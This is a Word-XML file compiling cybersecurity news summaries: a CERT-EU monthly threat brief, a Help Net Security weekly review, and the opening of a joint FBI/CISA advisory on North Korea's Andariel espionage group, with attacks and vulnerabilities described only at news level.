        <w:t>filtering, identity management, and abuse monitoring. Microsoft's approach includes a zero-trust model and the use of tools like PyRIT for risk identification. artificial intelligence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Hong Kong arrests activists who commemorate Tiananmen Square protests on social media In late May, Hong Kong law enforcement detained six individuals under a recent security law for social media posts inciting hatred against Beijing. The posts related to the Tiananmen Square protest anniversary on 4 June. This law, expanding government powers over broadly defined offences, aligns Hong Kong with China's security framework. social media china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Iran approves the creation of National Artificial Intelligence Organisation On June 20, Iran announced its approval for creating the National Artificial Intelligence Organisation (NAIO) as well as an AI steering council. The decision has been made by the Vice President for Science, Technology, and Knowledge-Based Economy where he also stated a 10-year roadmap to boost Iranian AI technologies as Khamenei has declared that Iran aims to be among the top 10 nations to secure its influence in artificial intelligence. iran artificial intelligence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YouTube removes Iranian Foreign Ministry's account Over US sanctions compliance On May 28, a YouTube spokeswoman confirmed that the video platform terminated an account run by Iran's Foreign Ministry to comply with US sanctions against the Islamic republic. The spokeswoman elaborated that Google is committed to compliance with applicable sanctions and trade compliance laws, and enforces related policies under their terms of service. sanctions iran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Biden bans US sales of Kaspersky software over Russia ties On June 20, the Biden administration announced a ban on US sales of Kaspersky Lab software, effective September 29, due to security concerns over Russian influence. Kaspersky denies the allegations and plans legal action. The ban covers downloads, resales, and licensing to mitigate cyberattack risks amid Ukraine war tensions. On June 21, OFAC sanctioned 12 Kaspersky Lab executives for operating in Russia's technology sector. ban russia united states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Microsoft acknowledges responsibility for major 2023 US government hack On June 13, The Washington Post reported that Microsoft President Brad Smith acknowledged the company's responsibility for a major hack of US government systems that occurred last year. In his testimony before Congress, Smith promised to enhance security practices and accepted findings from an investigation linking the breach to Chinese hackers. Despite criticism, Microsoft's products remain indispensable for both corporate and federal operations due to their deep integration. united states russia china public administration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Microsoft reportedly ignored security flaw to secure federal contract According to a June 13 report by ProPublica, an independent investigative newsroom, Microsoft hired cybersecurity expert Andrew Harris for his skills in protecting sensitive networks. In 2016, Harris discovered a critical flaw in a Microsoft application that allowed undetected data breaches. Despite his warnings, Microsoft prioritised securing a multibillion-dollar US government contract over fixing the issue, resulting in vulnerabilities exploited in the 2020 SolarWinds hack. Frustrated by inaction, Harris left Microsoft in 2020. united states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Department of Justice is offering a 10 million US dollars reward for information about GRU hacker On June 26, the US has indicted Russian national Amin Timovich Stigal for cyberattacks on Ukrainian government networks, linked to the GRU before Russia's invasion. Stigal distributed WhisperGate malware and exfiltrated sensitive data. His activities are also linked to operations targeting NATO and the US. A million US dollars reward is offered for information leading to his arrest. If convicted, he faces up to five years in prison. reward russia united states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 dismantles 911 S5 botnet On May 29, US FBI reported that they dismantled the 911 S5 botnet and arrested its administrator in a coordinated international law enforcement action. In the unsealed indictment they allege that the administrator and others created and disseminated malware to compromise and amass a network of millions of residential Windows computers worldwide. These devices were associated with more than 19 million unique IP addresses, including 613.841 IP addresses located in the United States. dismantle Cyberespionage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Microsoft notifies customers about e-mail exfiltration by APT29 On June 28, Reuters reported that Microsoft notified customers about the consequence of a cyberattack by the Russia-linked APT29 (aka Midnight Blizzard) threat actor, which occurred between late November 2023 and January 2024. The threat actor used a password spray attack to infiltrate Microsoft's e-mail systems, accessing e-mails exchanged between the company and its customers. Microsoft detected the breach on January 12, 2024, and is now notifying affected clients while taking measures to enhance its security systems. russia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Sophos finds overlap in infrastructure and tools between at least three China-linked intrusion sets On June 5, Sophos reported uncovering a complex, long-running Chinese state-sponsored cyberespionage operation in May 2023. The operation targeted a high-profile government organisation in Southeast Asia, tracking at least three intrusion clusters from March to December 2023. These clusters used tools and infrastructure linked to known Chinese threat actors, including BackdoorDiplomacy, REF5961, Worok, TA428, Unfading Sea Haze, and APT41 subgroup Earth Longzhi. china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UNC3886 a China-nexus cyberespionage actor exploited 4 zero days in the past few years On June 18, Mandiant and Google Cloud detailed activity associated with UNC3886. UNC3886 is a suspected China-nexus cyberespionage actor who exploited FortiOS and VMware vulnerabilities towards strategic targets globally between 2021 and 2024. UNC3886's activities include exploiting CVE- 2023-34048 (VMware vCenter) since late 2021 as well as three other zero- days. china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China-linked threat actor Velvet Ant abuses F5 Load Balancers for persistence On June 17, Israel-based security company SYGNIA published a report on China-linked threat actor Velvet Ant compromising the network of a large </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>organisation in late 2023. They infiltrated the network for about three years, maintaining multiple footholds, including using a legacy F5 BIG-IP appliance. china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AridViper APT targeting Android users with spyware On June 13, ESET reported five campaigns targeting Android users with trojanised apps since at least 2022, attributed to the AridViper group known to be targeting entities in the Middle-East. They deploy multistage Android spyware, dubbed AridSpy, that downloads first- and second-stage payloads from C2 servers. The malware is distributed through dedicated websites impersonating various messaging apps, a job opportunity app, and a Palestinian Civil Registry app. middle east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Pakistan-linked threat actor UTA0137 uses Discord-based malware to target Indian government On June 13, Volexity reported on Pakistan-linked threat actor UTA0137 using DISGOMOJI malware to target the Indian government. DISGOMOJI is a fork of discord-c2 malware that uses Discord for C2, employs emojis for communication. UTA0137 also utilised DirtyPipe exploit for privilege escalation on the Linux BOSS distribution. Volexity assesses UTA0137's campaign as successful. pakistan india Cybercrime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OTP bots bypass 2FA via phishing and social engineering On June 10, Kaspersky reported that phishing schemes using one-time password (OTP) bots are increasingly bypassing two-factor authentication by tricking victims into revealing OTP through social engineering tactics. Attackers use OTP bots to impersonate trusted organisations, make convincing calls to victims, and retrieve OTPs to gain unauthorised access to accounts, underscoring the need for enhanced vigilance and protective measures against such scams. phishing</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LockBit falsely claimed to have breached the US Federal Reserve On June 23, the LockBit ransomware group falsely claimed to have breached the US Federal Reserve, stealing 33 terabytes of sensitive data. It was later revealed they had actually targeted Evolve Bank &amp; Trust. The bank confirmed the breach and is addressing the issue, offering credit monitoring to affected customers. ransomware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P2Pinfect botnet targets Redis and deploy new ransomware On June 25, Cado Security reported on P2Pinfect, a sophisticated Rust- based malware, using a peer-to-peer botnet for its command-and-control mechanism. Initially appearing dormant and spreading via Redis and limited SSH, the malware has recently been updated to include ransomware and a crypto miner payload. P2Pinfect exploits Redis replication to gain code execution, scans for more servers, and uses SSH for further spread. ransomware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Malicious npm package targets AWS users with backdoor On June 26, ReversingLabs researchers published a report on a malicious npm package, legacyreact-aws-s3-typescript, targeting AWS users by mimicking a popular legitimate package. This package, dormant for four months, contained a postinstall script downloading a backdoor. supply-chain attack</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NetSupport delivered through MSIX packages On June 17, SANS ICS reported a NetSupport campaign using MSIX packages to deliver a malicious client, bypassing the need for custom C2 infrastructure. The campaign uses a portable 7zip version to install the client and targets Microsoft domains. Attributed to the cybercrime Sangria Tempest group, this attack abuses advertisement networks and MSIX installers. supply-chain attack Data exposure and leaks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Google reportedly suffers data leak On June 3, 404 Media, an independent digital media company, reported that Google experienced a leak of an internal database containing thousands of security and privacy incident reports from employees. These incidents included accidental recordings of children's voices and other sensitive data breaches. technology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Cybercrime actor intrude and extort Snowflake customers On June 10, Mandiant reported that UNC5537 has targeted Snowflake customer database instances for data theft and extortion. Snowflake is a multi-cloud data warehousing platform. UNC5537 is a financially motivated actor who compromised Snowflake customer instances using stolen credentials. They are selling victim data on cybercrime forums and attempting extortion, having allegedly stolen a significant volume of records from Snowflake customer environments. technology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Ticketmaster confirms massive breach after stolen data for sale online On May 20, Live Nation confirmed that Ticketmaster, a ticket sales and distribution platform, suffered a data breach after its data was stolen from a third-party cloud database provider, which is believed to be Snowflake. The breach has allegedly exposed the data of over 560 million Ticketmaster users. A threat actor known as Shiny Hunters is attempting to sell the Ticketmaster data on a hacking forum for 500.000 US dollars. entertainment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AI platform Hugging Face breached On May 31, AI platform Hugging Face revealed that its Spaces platform was breached, allowing hackers to access authentication secrets for its members. Hugging Face Spaces is a repository of AI apps created and submitted by the community's users, allowing other members to demo them. Hugging Face revoked authentication tokens in the compromised secrets and notified those impacted by email. However, they recommend that all users refresh their tokens. artificial intelligence Information operations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Chinese info ops targets daughter of exiled critic On June 27, the New York Times reported that a prominent Chinese writer who lives in exile in the US and who regularly criticises China and its leader has become the target of a cover influence operation on social media. The critic's teenage daughter has become subject to vulgar commentary on her social media accounts across X, Facebook, TripAdvisor, Patch, and even Niche, a website that helps parents choose schools. The report suggests that the vulgar comments are part of a coordinated Chinese influence operation associated to China's security services. china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Pakistani APTs escalate attacks on Indian government On April 24, Seqrite Labs reported an escalation in cyberattacks on Indian government entities by Pakistan-linked APTs, particularly SideCopy and Transparent Tribe (APT36). These groups reportedly used various RATs, including AllaKore and Crimson, in multiple campaigns. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Techniques involved spearphishing and leveraging compromised domains for payload delivery. Seqrite reported that the attacks are part of broader disinformation and influence operations aimed at destabilising Indian governmental and defence sectors. india world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Pravfond: a facade for Russian cyber operations and disinformation campaigns On June 2, 2024, an investigation by a consortium of newspapers, including DR and Le Monde, uncovered that Pravfond, a Russian organisation that purports to assist expatriates, is predominantly involved in financing legal defences for Kremlin-aligned individuals and suspected spies. The investigation revealed Pravfond's deep ties with Russian intelligence agencies and its participation in disinformation campaigns against Ukraine and anti-Western propaganda, underscoring its significant role in Russia's global geopolitical and intelligence strategies. russia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Fake CIA video from Russia sources aiming at spreading misinformation On June 19, CBS and other news outlets reported that a fake CIA video was circulating, warning Americans about a "high risk" of attacks on the Paris metro. This comes in light of efforts of disinformation campaigns from Russia against the Paris Olympics. The video originated from Russian sources before spreading to social media where it accumulated at least 100.000 views. russia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Israel reportedly targets US lawmakers with covert influence operation On June 5, the New York Times revealed Israel's 2 million US dollars covert influence campaign targeting US lawmakers and the public to support Gaza war actions. Managed by the Ministry of Diaspora Affairs and Stoic, the operation used fake accounts on social media to post pro-Israel comments, particularly targeting Black Democratic lawmakers. The campaign, identified by FakeReporter, was disrupted by Meta. israel united states Significant vulnerabilities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Confluence Data Center and Server Remote Code Execution A critical remote code execution (RCE) vulnerability, CVE-2024-21683, has been discovered in Atlassian's Confluence Data Center and Server. This vulnerability allows authenticated attackers with privileges of adding new macro languages to execute arbitrary code. See CERT-EU's SA 2024-054.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SolarWinds High-Severity Vulnerabilities On the 4th and 5th of June 2024, SolarWinds published four separate security advisories related to high-severity vulnerabilities in multiple products. CERT-EU strongly recommends patching them as soon as possible. See CERT-EU's SA 2024-055.</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Multiple Vulnerabilities in Microsoft Products* On June 11, 2024, Microsoft addressed 58 vulnerabilities in its June 2024 Patch Tuesday update, including one zero-day vulnerability. This Patch Tuesday also fixes one critical vulnerability, a Microsoft Message Queuing (MSMQ) Remote Code Execution vulnerability. See CERT-EU's SA 2024-056.</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Vulnerabilities in JetBrains Products On June 10, JetBrains released a fix for a vulnerability affecting IntelliJ-based IDEs 2023.1+ and JetBrains GitHub Plugin. This vulnerability could lead to disclosure of access tokens to third-party sites. See CERT- EU's SA 2024-057.</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Vulnerabilities in PHP On June 6, 2024, a critical vulnerability was identified in certain versions of PHP that could allow the execution of arbitrary code or disclosure of sensitive information on Windows systems using Apache and PHP- CGI. The vulnerability is currently being actively exploited, and several proof of concepts are available. See CERT-EU's SA 2024-058.</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Vulnerability in FortiOS On June 12, 2024, Fortinet disclosed a high-severity vulnerability identified as CVE-2024-23110 affecting FortiOS. This vulnerability allows an authenticated attacker to execute unauthorised code or commands via specially crafted command line arguments. The issue arises from multiple stack-based buffer overflow security defects in the command line interpreter. See CERT-EU's SA 2024-059.</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Vulnerabilities in VMware Products On June 17, 2024, VMware released fixes for three vulnerabilities affecting VMware vCenter Server and VMware Cloud Foundation. Two of these vulnerabilities are critical. Exploitation these vulnerabilities could allow a malicious actor to execute remote code or escalate privileges on the affected systems. See CERT-EU's SA 2024-060.</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Vulnerabilities in Nextcloud Products On June 14, 2024, Nextcloud released patches for Nextcloud Server and Enterprise Server. A vulnerability was disclosed in Nextcloud server products that allows the bypassing of the second factor of two-factor authentication (2FA). See CERT-EU's SA 2024-061.</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Vulnerabilities in Chrome and Chromium based Browsers Google has released a critical security update for its Chrome Browser, addressing six high-severity vulnerabilities that could lead to serious security issues. Chromium-based browsers are also impacted. See CERT-EU's SA 2024-062.</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Critical Vulnerability in MOVEit Transfer On June 25, 2024, Progress Software disclosed a critical vulnerability in Progress MOVEit Transfer. This vulnerability allows attackers to bypass authentication and access sensitive data. The vulnerability is actively being exploited, and there is an available proof of concept (PoC). See CERT- EU's SA 2024-063.</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Vulnerabilities in GitLab On June 26, 2024, GitLab released a security advisory addressing several vulnerabilities, one of which being critical, allowing an attacker to trigger a pipeline as another user under certain circumstances. See CERT- EU's SA 2024-064.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All CERT-EU's Security Advisories are available to the public on CERT-EU's website, https://www.cert.europa.eu/publications/security-advisories/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Conclusions or attributions made in this document merely reflect what publicly available sources report. They do not reflect our stance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>↩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>CERT-EU 2024.08.12 17:45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://cert.europa.eu/publications/threat-intelligence/cb24-07/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Week in review: Tips for starting your cybersecurity career, Patch Tuesday forecast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Here's an overview of some of last week's most interesting news, articles, interviews and videos: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August 2024 Patch Tuesday forecast: Looking for a calm August release August 2024 July ended up being more 'exciting' than many of us wanted; we're supposed to be in the height of summer vacation season. First, we had a large set of updates on Patch Tuesday, then we had to work through the CrowdStrike event, and finally many of us had Azure outages due to Microsoft responding to a DDoS attack.</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Critical 1Password flaws may allow hackers to snatch your passwords (CVE- 2024-42219, CVE-2024-42218) Two vulnerabilities (CVE-2024-42219, CVE-2024-42218) affecting the macOS version of the popular 1Password password manager could allow malware to steal secrets stored in the software's vaults and obtain the account unlock key, AgileBits has confirmed.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start your cybersecurity career: Expert tips and guidance As businesses strive to protect their data and privacy, the demand for skilled cybersecurity professionals continues to grow. This article provides expert advice to help you navigate the early stages of your cybersecurity career, offering practical tips and insights.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Scaling data security solutions: What you need to know In this Help Net Security interview, Bruno Kurtic, President and CEO at Bedrock Security, discusses the role of data visibility in enhancing cybersecurity.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 explains that effective data visibility involves discovering, classifying, and contextualizing data, which helps organizations understand and manage data flow and potential threats. Kurtic also addresses common implementation pitfalls and how real-time solutions integrate with existing cybersecurity frameworks.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Breaking down FCC's proposal to strengthen BGP security In this Help Net Security interview, Doug Madory, Director of Internet Analysis at Kentik, discusses the FCC's proposal requiring major U.S. ISPs to implement RPKI Route Origin Validation (ROV), and addresses concerns about the impact on smaller ISPs and the global implications of U.S.- mandated changes.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AI security 2024: Key insights for staying ahead of threats In this Help Net Security interview, Kojin Oshiba, co-founder of Robust Intelligence, discusses his journey from academic research to addressing AI security challenges in the industry.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MISP: Open-source threat intelligence and sharing platform MISP is an open-source threat intelligence and sharing platform for collecting, storing, distributing, and sharing cybersecurity indicators and threats related to incident and malware analysis.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RustScan: Open-source port scanner RustScan is an open-source port scanner designed for speed and versatility. It combines a sleek interface with the power to adapt and improve over time.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Traceeshark: Open-source plugin for Wireshark Traceeshark is a plugin for Wireshark that enables security practitioners to quickly investigate security incidents. It enhances the capabilities of Aqua Tracee, an open-source runtime security and forensics tool, and allows users to analyze kernel-level event and behavioral detection alongside network traffic.</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SSHamble: Open-source security testing of SSH services runZero published new research on Secure Shell (SSH) exposures and unveiled a corresponding open-source tool, SSHamble. This tool helps security teams validate SSH implementations by testing for uncommon but dangerous misconfigurations and software bugs.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Chinese hackers compromised an ISP to deliver malicious software updates APT StormBamboo compromised a undisclosed internet service provider (ISP) to poison DNS queries and thus deliver malware to target organizations, Volexity researchers have shared.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Critical Apache OFBiz pre-auth RCE flaw fixed, update ASAP! (CVE-2024-38856) CVE-2024-38856, an incorrect authorization vulnerability affecting all but the latest version of Apache OFBiz, may be exploited by remote, unauthenticated attackers to execute arbitrary code on vulnerable systems.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Researchers unearth MotW bypass technique used by threat actors for years Threat actors have been abusing a bug in how Windows handles LNK files with non-standard target paths and internal structures to prevent in-built protections from stopping malicious payloads and trick users into running them.</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Ransomware gang targets IT workers with new RAT masquerading as IP scanner Ransomware-as-a-service outfit Hunters International is wielding a new remote access trojan (RAT). "The malware, named SharpRhino due to its use of the C# programming language, is delivered through a typosquatting domain impersonating the legitimate tool Angry IP Scanner," Quorum Cyber researchers discovered.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Roundcube flaws allow easy email account compromise (CVE-2024-42009, CVE- 2024-42008) Two cross-site scripting vulnerabilities (CVE-2024-42009, CVE-2024-42008) affecting Roundcube could be exploited by attackers to steal users' emails and contacts, email password, and send emails from their account.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CrowdStrike engages external experts, details causes of massive outage CrowdStrike has published a technical root cause analysis of what went wrong when a content update pushed to its Falcon sensors borked over 8.5 million Windows machines around the world on July 19, and has confirmed that it has hired two unnamed third-party software security vendors to review the security and quality assurance of the Falcon sensor code.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"Perfect" Windows downgrade attack turns fixed vulnerabilities into zero- days A researcher has developed a downgrade attack that can make Windows machines covertly, persistently and irreversibly vulnerable, even if they were fully patched before that.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Microsoft 365 anti-phishing alert "erased" with one simple trick Attackers looking for a way into organizations using Microsoft 365 can make an alert identifying unsolicited (and thus potential phishing) emails "disappear".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"0.0.0.0-Day" vulnerability affects Chrome, Safari and Firefox A "0.0.0.0-Day" vulnerability affecting Chrome, Safari and Firefox can be - and has been - exploited by attackers to gain access to services on internal networks, Oligo Security researchers have revealed.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role of AI in cybersecurity operations Security operation centers (SOCs) need to be better equipped to manage the sheer scale of data to monitor and the increasing sophistication of threats. SOC analysts face a daunting task: sifting through thousands of alerts every day - most of which are false positives - while swiftly identifying and mitigating genuine threats.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ITSM concerns when integrating new AI services Failures should give pause to any business leader looking to integrate AI into their operations. They're a reminder to organizations about the complexities and risks associated with integrating this shiny, new technology into vital processes.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Sports venues must vet their vendors to maintain security The rapid development of technology within the sports industry (e.g., augmented reality, smart turnstiles, facial recognition) and complex interdependencies between suppliers have increased the complexity of cybersecurity concerns. In our highly connected world, the rise of digital twins and collaboration across various platforms is transforming the sports landscape into an interconnected business network.</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How network segmentation can strengthen visibility in OT networks Without visibility, it's not possible to establish a baseline of what should be considered normal traffic on the OT network. The baseline allows you to catalog an inventory of systems and their interactions so that when something unusual happens, it stands out. The baseline also should feed vulnerability management, patch management, and risk management for that entire environment.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NIS2: A catalyst for cybersecurity innovation or just another box-ticking exercise?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Network and Information Security (NIS) 2 Directive is possibly one of the most significant pieces of cybersecurity regulation to ever hit Europe. The 27 EU Member States have until 17 October 2024 to adopt and publish the standards necessary to comply with NIS2, which brings increased requirements to strengthen security conditions and report more regularly, with shorter deadlines, on cyber-attacks.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How life sciences companies use AI to fill the cybersecurity skills gap In this Help Net Security video, Beth Miller, Field CISO at Code42, highlights a significant trend: 73% of life sciences companies turn to AI to address the cybersecurity skills gap, surpassing adoption rates in other industries.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Securing against GenAI weaponization In this Help Net Security video, Aaron Fulkerson, CEO of Opaque, discusses how the weaponization of generative AI (GenAI) has made existing data privacy practices (like masking, anonymization, tokenization, etc.) obsolete.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AI expected to improve IT/OT network management Once a peripheral concern, OT security has become a mandatory focus for organizations worldwide, according to Cisco's report.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AI-fueled phishing scams raise alarm ahead of U.S. presidential election Highlighting growth of phishing and digital scams targeting United States citizens, Bolster released a research that identified 24 separate nation- state threat actor groups attempting to exploit rising political tensions across the US to interfere with the 2024 presidential election.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Email attacks skyrocket 293% Email attacks have surged by 293% in the first half of 2024 compared to the same period in 2023, according to Acronis. The number of ransomware detections was also on the rise, increasing 32% from Q4 2023 to Q1 2024.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Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io.</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OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware Forescout has published a new report examining the current state of the software supply chain in OT/IoT routers. The study uncovered that OT and IoT cellular routers and those used in small offices and homes contain outdated software components associated with known ("n-day") vulnerabilities.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Ransomware operators continue to innovate Ransomware groups continue to refine their craft, building and scaling business models that resemble legitimate corporate enterprises, according to Rapid7. They market their services to prospective buyers, offer company insiders commissions in exchange for access, and run formal bug bounty programs.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Where internal audit teams are spending most of their time Over half of key stakeholders including audit committees, company boards, and chief financial officers are looking to internal audit teams to take on more risk-related work, according to AuditBoard.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Shorter TLS certificate lifespans expected to complicate management efforts 76% of security leaders recognize the pressing need to move to shorter certificate lifespans to improve security, according to Venafi. However, many feel unprepared to take action, with 77% saying the shift to 90-day certificates will mean more outages are inevitable.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Malware-as-a-Service and Ransomware-as-a-Service lower barriers for cybercriminals The sophistication of cyber threats has escalated dramatically, with malicious actors' deploying advanced tactics, techniques, and procedures (TTPs) to exploit vulnerabilities and evade detection, according to Darktrace.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Photos: Black Hat USA 2024 Startup City Here's a look inside Startup City at Black Hat USA 2024. The featured vendors are: BackBox, Cybral, DryRun Security, HackNotice, Heeler Security, Hushmesh, MobileHop, Nagomi Security, Ox Security, Plainsea, Raven, Scribe Security, Spyderbat, and Xygeni.</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Photos: Black Hat USA 2024 Arsenal At the Black Hat USA 2024 Arsenal by ToolsWatch, researchers showcase their latest cybersecurity open-source tools.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Whitepaper: Tools to tackle the multicloud environment Implementing multicloud solutions is becoming increasingly paramount for organizations seeking to drive their business forward in the coming years. As a result, the role of cloud security is evolving.</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Download: CIS Critical Security Controls v8.1 Version 8.1 of the CIS Critical Security Controls (CIS Controls) is an iterative update to version 8.0. It offers prescriptive, prioritized, and simplified cybersecurity best practices that provide a clear path to improve your organization's cyber defense program.</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New infosec products of the week: August 9, 2024 Here's a look at the most interesting products from the past week, featuring releases from: Rapid7, AppOmni, Contrast Security, Elastic, Cequence Security, Veza, ArmorCode, and EndorLabs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2024.08.11 11:52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2024/08/11/week-in-review-tips-for-starting-your-cybersecurity-career-patch-tuesday-forecast/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs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Release Date July 25, 2024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Alert Code AA24-207A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Critical Infrastructure Security and Resilience, Incident Detection, Response, and Prevention, Nation-State Cyber Actors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Summary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Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People's Republic of Korea (DPRK)'s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju: U.S. Cyber National Mission Force (CNMF) U.S. Cybersecurity and Infrastructure Security Agency (CISA) U.S. Department of Defense Cyber Crime Center (DC3) U.S. National Security Agency (NSA) Republic of Korea's National Intelligence Service (NIS) Republic of Korea's National Police Agency (NPA) United Kingdom's National Cyber Security Centre (NCSC)</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RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime's military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.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actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.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actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.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The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>industries and fields should remain vigilant in defending their networks from North Korea state- sponsored cyber operations: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additional information on DPRK state-sponsored malicious cyber activity, see CISA's North Korea Cyber Threat Overview and Advisories webpage.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Download the PDF version of this report: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AA24-207A North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs (PDF, 801.28 KB )</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a downloadable copy of associated indicators of compromise (IOCs), see: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AA24-207A STIX XML (XML, 296.99 KB )</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AA24-207A STIX JSON (JSON, 140.84 KB ) Technical Details RGB 3rd Bureau</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Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations. Cyber Espionage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actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.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 Andariel Cyber Espionage Victimology Industry Information Targeted Defense Heavy and light tanks and self-propelled howitzers Light strike vehicles and ammunition supply vehicles Littoral combat ships and combatant craft Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs) Modeling and simulation services Aerospace Fighter aircraft and unmanned aerial vehicles (UAVs) Missiles and missile defense systems Satellites, satellite communications, and nano-satellite technology Surveillance 